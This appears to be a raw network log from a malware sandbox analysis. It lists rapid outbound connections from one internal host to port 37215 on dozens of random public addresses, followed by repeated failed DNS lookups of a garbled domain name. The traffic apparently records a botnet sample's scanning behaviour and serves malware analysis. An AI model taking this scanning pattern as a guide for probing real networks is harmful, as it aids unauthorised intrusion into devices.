Mar 20, 2023 18:14:40.716908932 CET	36142	37215	192.168.2.23	197.237.79.227
Mar 20, 2023 18:14:40.716932058 CET	36142	37215	192.168.2.23	41.221.78.232
Mar 20, 2023 18:14:40.716957092 CET	36142	37215	192.168.2.23	197.70.163.165
Mar 20, 2023 18:14:40.717622042 CET	36142	37215	192.168.2.23	41.173.1.78
Mar 20, 2023 18:14:40.717645884 CET	36142	37215	192.168.2.23	39.11.52.215
Mar 20, 2023 18:14:40.717731953 CET	36142	37215	192.168.2.23	157.208.122.69
Mar 20, 2023 18:14:40.717782021 CET	36142	37215	192.168.2.23	60.244.169.67
Mar 20, 2023 18:14:40.717783928 CET	36142	37215	192.168.2.23	197.175.165.248
Mar 20, 2023 18:14:40.717783928 CET	36142	37215	192.168.2.23	41.222.26.180
Mar 20, 2023 18:14:40.717806101 CET	36142	37215	192.168.2.23	157.170.213.152
Mar 20, 2023 18:14:40.717834949 CET	36142	37215	192.168.2.23	41.157.122.250
Mar 20, 2023 18:14:40.717890978 CET	36142	37215	192.168.2.23	157.252.111.132
Mar 20, 2023 18:14:40.717969894 CET	36142	37215	192.168.2.23	41.193.188.233
Mar 20, 2023 18:14:40.717977047 CET	36142	37215	192.168.2.23	157.49.20.65
Mar 20, 2023 18:14:40.717978001 CET	36142	37215	192.168.2.23	41.221.204.112
Mar 20, 2023 18:14:40.717989922 CET	36142	37215	192.168.2.23	157.66.25.180
Mar 20, 2023 18:14:40.718014002 CET	36142	37215	192.168.2.23	38.94.45.213
Mar 20, 2023 18:14:40.718040943 CET	36142	37215	192.168.2.23	197.218.37.131
Mar 20, 2023 18:14:40.718063116 CET	36142	37215	192.168.2.23	197.27.94.129
Mar 20, 2023 18:14:40.718087912 CET	36142	37215	192.168.2.23	197.40.41.133
Mar 20, 2023 18:14:40.718110085 CET	36142	37215	192.168.2.23	41.45.140.191
Mar 20, 2023 18:14:40.718135118 CET	36142	37215	192.168.2.23	201.102.113.173
Mar 20, 2023 18:14:40.718158007 CET	36142	37215	192.168.2.23	157.4.146.200
Mar 20, 2023 18:14:40.718180895 CET	36142	37215	192.168.2.23	157.233.163.132
Mar 20, 2023 18:14:40.718202114 CET	36142	37215	192.168.2.23	41.181.83.105
Mar 20, 2023 18:14:40.718226910 CET	36142	37215	192.168.2.23	197.170.166.174
Mar 20, 2023 18:14:40.718266964 CET	36142	37215	192.168.2.23	157.84.230.108
Mar 20, 2023 18:14:40.718288898 CET	36142	37215	192.168.2.23	157.131.241.193
Mar 20, 2023 18:14:40.718358994 CET	36142	37215	192.168.2.23	197.76.57.13
Mar 20, 2023 18:14:40.718420982 CET	36142	37215	192.168.2.23	157.178.19.72
Mar 20, 2023 18:14:40.718422890 CET	36142	37215	192.168.2.23	197.216.63.67
Mar 20, 2023 18:14:40.718430996 CET	36142	37215	192.168.2.23	197.157.223.144
Mar 20, 2023 18:14:40.718451977 CET	36142	37215	192.168.2.23	157.213.69.195
Mar 20, 2023 18:14:40.718477011 CET	36142	37215	192.168.2.23	197.37.128.221
Mar 20, 2023 18:14:40.718477011 CET	36142	37215	192.168.2.23	41.196.110.94
Mar 20, 2023 18:14:40.718521118 CET	36142	37215	192.168.2.23	157.16.173.74
Mar 20, 2023 18:14:40.718540907 CET	36142	37215	192.168.2.23	157.203.63.11
Mar 20, 2023 18:14:40.718605042 CET	36142	37215	192.168.2.23	157.187.144.11
Mar 20, 2023 18:14:40.718605042 CET	36142	37215	192.168.2.23	157.33.111.40

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 20, 2023 18:14:40.710655928 CET	192.168.2.23	8.8.8.8	0xe0a4	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.729371071 CET	192.168.2.23	8.8.8.8	0xe0a4	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.748934031 CET	192.168.2.23	8.8.8.8	0xe0a4	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.767157078 CET	192.168.2.23	8.8.8.8	0xe0a4	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.786946058 CET	192.168.2.23	8.8.8.8	0xe0a4	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.806308031 CET	192.168.2.23	8.8.8.8	0x8e4b	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.824856997 CET	192.168.2.23	8.8.8.8	0x8e4b	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.845232964 CET	192.168.2.23	8.8.8.8	0x8e4b	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.863372087 CET	192.168.2.23	8.8.8.8	0x8e4b	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.883501053 CET	192.168.2.23	8.8.8.8	0x8e4b	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.903549910 CET	192.168.2.23	8.8.8.8	0x2d96	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.923871040 CET	192.168.2.23	8.8.8.8	0x2d96	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.944060087 CET	192.168.2.23	8.8.8.8	0x2d96	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.964304924 CET	192.168.2.23	8.8.8.8	0x2d96	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.984107018 CET	192.168.2.23	8.8.8.8	0x2d96	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.002443075 CET	192.168.2.23	8.8.8.8	0x8437	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.021122932 CET	192.168.2.23	8.8.8.8	0x8437	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.039206028 CET	192.168.2.23	8.8.8.8	0x8437	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.059446096 CET	192.168.2.23	8.8.8.8	0x8437	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.077682018 CET	192.168.2.23	8.8.8.8	0x8437	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.097577095 CET	192.168.2.23	8.8.8.8	0xda8a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.116137981 CET	192.168.2.23	8.8.8.8	0xda8a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.136562109 CET	192.168.2.23	8.8.8.8	0xda8a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.154822111 CET	192.168.2.23	8.8.8.8	0xda8a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.175090075 CET	192.168.2.23	8.8.8.8	0xda8a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.195401907 CET	192.168.2.23	8.8.8.8	0x4344	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.216114044 CET	192.168.2.23	8.8.8.8	0x4344	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.236242056 CET	192.168.2.23	8.8.8.8	0x4344	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.254297018 CET	192.168.2.23	8.8.8.8	0x4344	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.272198915 CET	192.168.2.23	8.8.8.8	0x4344	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.292524099 CET	192.168.2.23	8.8.8.8	0xf909	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.312907934 CET	192.168.2.23	8.8.8.8	0xf909	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.333441973 CET	192.168.2.23	8.8.8.8	0xf909	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.351639032 CET	192.168.2.23	8.8.8.8	0xf909	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.372216940 CET	192.168.2.23	8.8.8.8	0xf909	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.390887976 CET	192.168.2.23	8.8.8.8	0x8cd2	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.413100004 CET	192.168.2.23	8.8.8.8	0x8cd2	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.432490110 CET	192.168.2.23	8.8.8.8	0x8cd2	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.450932026 CET	192.168.2.23	8.8.8.8	0x8cd2	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.470230103 CET	192.168.2.23	8.8.8.8	0x8cd2	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.488826036 CET	192.168.2.23	8.8.8.8	0xc8a8	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.509450912 CET	192.168.2.23	8.8.8.8	0xc8a8	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.527558088 CET	192.168.2.23	8.8.8.8	0xc8a8	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.545166016 CET	192.168.2.23	8.8.8.8	0xc8a8	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.565135002 CET	192.168.2.23	8.8.8.8	0xc8a8	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.583404064 CET	192.168.2.23	8.8.8.8	0xcd9a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.601807117 CET	192.168.2.23	8.8.8.8	0xcd9a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.621901035 CET	192.168.2.23	8.8.8.8	0xcd9a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.646783113 CET	192.168.2.23	8.8.8.8	0xcd9a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.666836023 CET	192.168.2.23	8.8.8.8	0xcd9a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.685048103 CET	192.168.2.23	8.8.8.8	0x68f0	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.705912113 CET	192.168.2.23	8.8.8.8	0x68f0	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.725862026 CET	192.168.2.23	8.8.8.8	0x68f0	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.743865967 CET	192.168.2.23	8.8.8.8	0x68f0	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.763892889 CET	192.168.2.23	8.8.8.8	0x68f0	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.784017086 CET	192.168.2.23	8.8.8.8	0x9235	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.803886890 CET	192.168.2.23	8.8.8.8	0x9235	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.821916103 CET	192.168.2.23	8.8.8.8	0x9235	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.842101097 CET	192.168.2.23	8.8.8.8	0x9235	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.860243082 CET	192.168.2.23	8.8.8.8	0x9235	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.879518986 CET	192.168.2.23	8.8.8.8	0x5787	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.899801970 CET	192.168.2.23	8.8.8.8	0x5787	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.917967081 CET	192.168.2.23	8.8.8.8	0x5787	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.937931061 CET	192.168.2.23	8.8.8.8	0x5787	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.958604097 CET	192.168.2.23	8.8.8.8	0x5787	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:51.976836920 CET	192.168.2.23	8.8.8.8	0xf25e	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:51.995378017 CET	192.168.2.23	8.8.8.8	0xf25e	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.015284061 CET	192.168.2.23	8.8.8.8	0xf25e	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.033797026 CET	192.168.2.23	8.8.8.8	0xf25e	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.051847935 CET	192.168.2.23	8.8.8.8	0xf25e	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.072233915 CET	192.168.2.23	8.8.8.8	0xd197	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.092406034 CET	192.168.2.23	8.8.8.8	0xd197	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.110358953 CET	192.168.2.23	8.8.8.8	0xd197	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.128492117 CET	192.168.2.23	8.8.8.8	0xd197	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.146922112 CET	192.168.2.23	8.8.8.8	0xd197	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.165262938 CET	192.168.2.23	8.8.8.8	0xf829	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.185560942 CET	192.168.2.23	8.8.8.8	0xf829	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.205780029 CET	192.168.2.23	8.8.8.8	0xf829	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.223917961 CET	192.168.2.23	8.8.8.8	0xf829	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.243792057 CET	192.168.2.23	8.8.8.8	0xf829	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.261904955 CET	192.168.2.23	8.8.8.8	0x7773	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.281975031 CET	192.168.2.23	8.8.8.8	0x7773	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.300118923 CET	192.168.2.23	8.8.8.8	0x7773	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.318254948 CET	192.168.2.23	8.8.8.8	0x7773	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.338167906 CET	192.168.2.23	8.8.8.8	0x7773	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.355822086 CET	192.168.2.23	8.8.8.8	0x13a6	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.374198914 CET	192.168.2.23	8.8.8.8	0x13a6	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.391611099 CET	192.168.2.23	8.8.8.8	0x13a6	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.409610987 CET	192.168.2.23	8.8.8.8	0x13a6	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.427755117 CET	192.168.2.23	8.8.8.8	0x13a6	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.445678949 CET	192.168.2.23	8.8.8.8	0xd685	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.465651989 CET	192.168.2.23	8.8.8.8	0xd685	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.483763933 CET	192.168.2.23	8.8.8.8	0xd685	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.502015114 CET	192.168.2.23	8.8.8.8	0xd685	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.519937038 CET	192.168.2.23	8.8.8.8	0xd685	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.540028095 CET	192.168.2.23	8.8.8.8	0x3f01	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.558434010 CET	192.168.2.23	8.8.8.8	0x3f01	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.576556921 CET	192.168.2.23	8.8.8.8	0x3f01	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.597016096 CET	192.168.2.23	8.8.8.8	0x3f01	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.616880894 CET	192.168.2.23	8.8.8.8	0x3f01	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.634846926 CET	192.168.2.23	8.8.8.8	0x958a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.652947903 CET	192.168.2.23	8.8.8.8	0x958a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.670708895 CET	192.168.2.23	8.8.8.8	0x958a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.690668106 CET	192.168.2.23	8.8.8.8	0x958a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.710665941 CET	192.168.2.23	8.8.8.8	0x958a	Standard query (0)	BC@^]B	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 20, 2023 18:14:40.728677988 CET	8.8.8.8	192.168.2.23	0xe0a4	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.747214079 CET	8.8.8.8	192.168.2.23	0xe0a4	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.766967058 CET	8.8.8.8	192.168.2.23	0xe0a4	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.786787033 CET	8.8.8.8	192.168.2.23	0xe0a4	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:40.804503918 CET	8.8.8.8	192.168.2.23	0xe0a4	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.824502945 CET	8.8.8.8	192.168.2.23	0x8e4b	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.844948053 CET	8.8.8.8	192.168.2.23	0x8e4b	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.863142014 CET	8.8.8.8	192.168.2.23	0x8e4b	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.883037090 CET	8.8.8.8	192.168.2.23	0x8e4b	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:41.903458118 CET	8.8.8.8	192.168.2.23	0x8e4b	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.923542023 CET	8.8.8.8	192.168.2.23	0x2d96	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.943679094 CET	8.8.8.8	192.168.2.23	0x2d96	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.964112997 CET	8.8.8.8	192.168.2.23	0x2d96	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:49.983896971 CET	8.8.8.8	192.168.2.23	0x2d96	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:50.002075911 CET	8.8.8.8	192.168.2.23	0x2d96	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.020864010 CET	8.8.8.8	192.168.2.23	0x8437	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.038903952 CET	8.8.8.8	192.168.2.23	0x8437	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.059125900 CET	8.8.8.8	192.168.2.23	0x8437	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.077517986 CET	8.8.8.8	192.168.2.23	0x8437	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:14:57.097563982 CET	8.8.8.8	192.168.2.23	0x8437	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.115888119 CET	8.8.8.8	192.168.2.23	0xda8a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.136253119 CET	8.8.8.8	192.168.2.23	0xda8a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.154548883 CET	8.8.8.8	192.168.2.23	0xda8a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.174738884 CET	8.8.8.8	192.168.2.23	0xda8a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:06.194849968 CET	8.8.8.8	192.168.2.23	0xda8a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.215801954 CET	8.8.8.8	192.168.2.23	0x4344	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.235914946 CET	8.8.8.8	192.168.2.23	0x4344	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.254033089 CET	8.8.8.8	192.168.2.23	0x4344	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.271939993 CET	8.8.8.8	192.168.2.23	0x4344	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:10.292166948 CET	8.8.8.8	192.168.2.23	0x4344	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.312576056 CET	8.8.8.8	192.168.2.23	0xf909	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.333122015 CET	8.8.8.8	192.168.2.23	0xf909	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.351407051 CET	8.8.8.8	192.168.2.23	0xf909	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.371886015 CET	8.8.8.8	192.168.2.23	0xf909	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:14.390366077 CET	8.8.8.8	192.168.2.23	0xf909	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.412714005 CET	8.8.8.8	192.168.2.23	0x8cd2	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.432138920 CET	8.8.8.8	192.168.2.23	0x8cd2	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.450726986 CET	8.8.8.8	192.168.2.23	0x8cd2	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.469994068 CET	8.8.8.8	192.168.2.23	0x8cd2	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:15.488811016 CET	8.8.8.8	192.168.2.23	0x8cd2	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.509138107 CET	8.8.8.8	192.168.2.23	0xc8a8	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.527192116 CET	8.8.8.8	192.168.2.23	0xc8a8	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.544874907 CET	8.8.8.8	192.168.2.23	0xc8a8	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.564853907 CET	8.8.8.8	192.168.2.23	0xc8a8	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:25.583019972 CET	8.8.8.8	192.168.2.23	0xc8a8	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.601525068 CET	8.8.8.8	192.168.2.23	0xcd9a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.621629000 CET	8.8.8.8	192.168.2.23	0xcd9a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.646460056 CET	8.8.8.8	192.168.2.23	0xcd9a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.666532040 CET	8.8.8.8	192.168.2.23	0xcd9a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:30.684571028 CET	8.8.8.8	192.168.2.23	0xcd9a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.705599070 CET	8.8.8.8	192.168.2.23	0x68f0	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.725529909 CET	8.8.8.8	192.168.2.23	0x68f0	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.743591070 CET	8.8.8.8	192.168.2.23	0x68f0	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.763623953 CET	8.8.8.8	192.168.2.23	0x68f0	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:32.783682108 CET	8.8.8.8	192.168.2.23	0x68f0	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.803610086 CET	8.8.8.8	192.168.2.23	0x9235	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.821660995 CET	8.8.8.8	192.168.2.23	0x9235	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.841850996 CET	8.8.8.8	192.168.2.23	0x9235	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.860014915 CET	8.8.8.8	192.168.2.23	0x9235	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:38.879367113 CET	8.8.8.8	192.168.2.23	0x9235	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.899549007 CET	8.8.8.8	192.168.2.23	0x5787	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
